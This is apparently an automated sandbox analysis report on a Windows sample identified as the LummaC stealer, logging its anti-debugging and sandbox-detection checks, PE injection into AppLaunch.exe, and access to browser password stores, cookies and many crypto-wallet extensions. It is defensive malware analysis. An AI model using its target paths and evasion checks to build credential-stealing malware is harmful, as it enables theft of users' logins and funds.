Code function: 1_2_0046161C FindFirstFileExW,FindNextFileW,FindClose,FindClose,

1_2_0046161C

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node			graph_0-64619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	API call chain: ExitProcess graph end node

Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004F58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004F9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D0C948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_6D0C948B

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D07B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6D07B6C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 1_2_004395E1 GetProcessHeap,RtlFreeHeap,

1_2_004395E1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0045F3EF mov eax, dword ptr fs:[00000030h]	1_2_0045F3EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00455AC6 mov ecx, dword ptr fs:[00000030h]	1_2_00455AC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00445CEE mov eax, dword ptr fs:[00000030h]	1_2_00445CEE

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0C948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6D0C948B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0CB144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D0CB144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0045D03B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0045D03B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00447303 SetUnhandledExceptionFilter,	1_2_00447303
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0044730F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0044730F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00447810 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00447810

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 46D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 47A000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 47E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4B43008	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D0C84B0 cpuid

0_2_6D0C84B0

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D0CA25A GetSystemTimeAsFileTime,__aulldiv,

0_2_6D0CA25A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 1_2_00463224 GetTimeZoneInformation,

1_2_00463224

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 1.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1722309595.0000000004A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 7548, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004FBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: AppLaunch.exe, 00000001.00000002.2148877113.0000000007A4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Edge/Default/Extensions/Jaxx Libertyd
Source: AppLaunch.exe, 00000001.00000002.2141662418.00000000075B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletN"
Source: AppLaunch.exe, 00000001.00000002.2148877113.0000000007A4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Edge/Default/Extensions/ExodusWeb3
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\EthereumJ"
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004FD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "keystore"

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Source: Yara match

File source: Process Memory Space: AppLaunch.exe PID: 7548, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 1.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1722309595.0000000004A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 7548, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D07A0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6D07A0C0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Native API	Path Interception	311 Process Injection	1 Masquerading	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
